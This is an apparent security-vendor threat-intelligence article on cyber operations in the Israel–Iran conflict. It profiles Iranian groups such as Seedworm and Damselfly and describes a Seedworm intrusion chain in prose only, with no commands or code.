The conflict in the Middle East continues to make headlines, as it has done since the October 7, 2023 Hamas attacks against Israel, which led to Israel retaliating with an ongoing onslaught on the Gaza Strip. The situation heated up further in recent weeks, with Israel and Iran both bombing each other’s territories, leading to U.S. intervention when it bombed Iran’s nuclear facilities, attempting to disrupt or destroy Iran’s nuclear program. Shortly after, U.S. President Donald Trump announced a ceasefire between the two countries, which, at time of writing, appears to be tentatively holding.
While most of the attention has focused on the physical actions occurring in this war, such as bombing, aid blockades and destruction, another potential front in the war is cyber space, an increasingly common arena in modern conflicts. Both Israel and Iran, two of the main players in the current hostilities, have a history of carrying out destructive cyber attacks, including against each other.
We published a whitepaper last year discussing the cyber activity we typically see emanating from this region titled Conflict in the Middle East: An Overview of Cyber Threat Actors and Risks.
One of the most infamous cyber incidents to take place in this region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. This facility was one of the targets bombed by the U.S. in its recent strikes against Iran. Stuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to manipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom of Natanz’s enrichment centrifuges to shatter. It was first published about by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Stuxnet has long been suspected to be the work of the U.S. and Israel, though it has never been claimed by either country. Given that Stuxnet was only discovered after penetrating private networks, it is quite possible that cyber operations are currently being leveraged by and against these governments without our knowledge.
Recent media reports indicate potential cyber warfare impacting the region, including an attack by pro-Israel hackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (See more in Damselfly profile).
Damselfly is just one of the key cyber actors who are most likely to be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes.
Key Actors
We have reasonably good insight into some of the main Iranian actors and their activity. Iranian threat actors have become increasingly proficient in recent years. Not only has their malware improved, but they’ve also developed a strong social engineering capability that they’ve leveraged against targets of interest, even mounting digital honeytrap operations.
One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S., and its long-standing foe Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.
There are a couple of Iranian threat actors worth noting that are among the most active at the moment, the first of which is Seedworm (aka MuddyWater, Temp Zagros, Static Kitten). Seedworm is a long-standing Iranian group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. Active since 2017, CISA said that Seedworm is “a subordinate element within the Iranian Ministry of Intelligence and Security.” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.
While originally focused on espionage, in recent times Seedworm has begun either collaborating with another threat group, or else has a sub-group within it, carrying out destructive attacks that masquerade as ransomware. These attacks involve ransomware known as DarkBit and, while it does encrypt computers like regular ransomware, the attackers seem more interested in making a statement than collecting a ransom. Some of the ransom notes they’ve left have had an unusually political tone, implying the ransomware was deployed more as retaliation rather than a money generating exercise.
Case Study: Seedworm targets smaller organizations
A recent campaign tentatively linked to Seedworm focused on smaller organizations, including organizations in utility, transport, and the manufacturing sector outside the Middle East.
The attackers took advantage of compromised home routers that were infected with the Mirai malware. It isn’t clear if this access was purchased or if the infections were initiated by Seedworm itself, but it had access to numerous compromised home routers from which it attacked the victim organizations by proxying through them. These attacks did not come from Iranian IP addresses, they came from small routers in a whole range of countries. Seedworm used this network of hacked routers to scan for vulnerable IIS servers, and used a variety of known vulnerabilities to then gain access to these servers. Once on these servers, it used an off-the-shelf tool, known as Plink, that allowed it to create a reverse RDP tunnel. Plink is a legitimate off-the-shelf tool. RDP inbound connections were blocked by the firewall but Plink is able to create an outbound SSH connection back to the attacker, which is allowed, and that connection is then used to tunnel classic RDP traffic, bypassing the firewall.
Seedworm then sideloaded BruteRatel, a commercial red-teaming and adversarial attack simulation tool, and used a scheduled task for persistence. The attackers used Brute Ratel to obtain credentials and once they had them they began to latterly traverse to other machines and ultimately obtained more credentials using reg.exe, by dumping the SAM. Seedworm then gained access to file servers and SQL servers seeking data of interest. It launched SQL injection attacks across the internal network to gain access to the SQL servers.